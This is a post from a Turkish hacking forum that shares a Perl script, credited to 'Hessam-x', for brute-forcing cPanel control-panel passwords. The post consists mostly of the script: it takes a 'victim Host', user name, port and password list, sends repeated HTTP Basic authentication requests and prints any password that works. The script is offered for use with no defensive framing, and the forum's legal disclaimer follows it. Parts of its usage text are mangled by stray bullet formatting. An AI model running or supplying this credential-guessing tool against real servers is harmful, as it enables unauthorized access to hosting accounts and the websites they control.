cPanel Password BruteForce ( PerL )

Bё-ҲнΆĉк

Katılımcı Üye
16 Ağu 2007
888
8
«¹Bё-ҲнΆĉ꬙»
#!/usr/bin/perl
# Cpanel Password Brute Forcer
# ----------------------------
# (c)oded By Hessam-x
# Perl Version ( low speed )
# Oerginal Advisory :
use IO::Socket;
use LWP::Simple;
use MIME::Base64;

$host = $ARGV[0];
$user = $ARGV[1];
$port = $ARGV[2];
$list = $ARGV[3];
$file = $ARGV[4];
$url = "http://".$host.":".$port;
if(@ARGV < 3){
print q(
################################################## #############
# Cpanel Password Brute Force Tool #
################################################## #############
# usage : cpanel.pl [HOST] [User] [PORT]
  • [File] #
    #-------------------------------------------------------------#
    # [Host] : victim Host (simorgh-ev.com) #
    # [User] : User Name (demo) #
    # [PORT] : Port of Cpanel (2082) #
    #
    • : File Of password list (list.txt) #
      # [File] : file for save password (password.txt) #
      # #
      ################################################## #############
      # (c)oded By Hessam-x / simorgh-ev.com #
      ################################################## #############
      );exit;}

      headx();

      $numstart = "-1";

      sub headx() {
      print q(
      ################################################## #############
      # Cpanel Password Brute Force Tool #
      # (c)oded By Hessam-x / simorgh-ev.com #
      ################################################## #############
      );
      open (PASSFILE, "<$list") || die "[-] Can't open the List of password file !";
      @PASSWORDS = <PASSFILE>;
      close PASSFILE;
      foreach my $P (@PASSWORDS) {
      chomp $P;
      $passwd = $P;
      print "
      [~] Try Password : $passwd
      ";
      &brut;
      };
      }
      sub brut() {
      $authx = encode_base64($user.":".$passwd);
      print $authx;
      my $sock = IO::Socket::INET->new(Proto => "tcp",PeerAddr => "$host", PeerPort => "$port") || print "
      [-] Can not connect to the host";
      print $sock "GET / HTTP/1.1
      ";
      print $sock "Authorization: Basic $authx
      ";
      print $sock "Connection: Close

      ";
      read $sock, $answer, 128;
      close($sock);

      if ($answer =~ /Moved/) {
      print "
      [~] PASSWORD FOUND : $passwd
      ";
      exit();
      }
      }

      hAYIRLI Olsun .. Pek fazla İşE YaramaZ
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.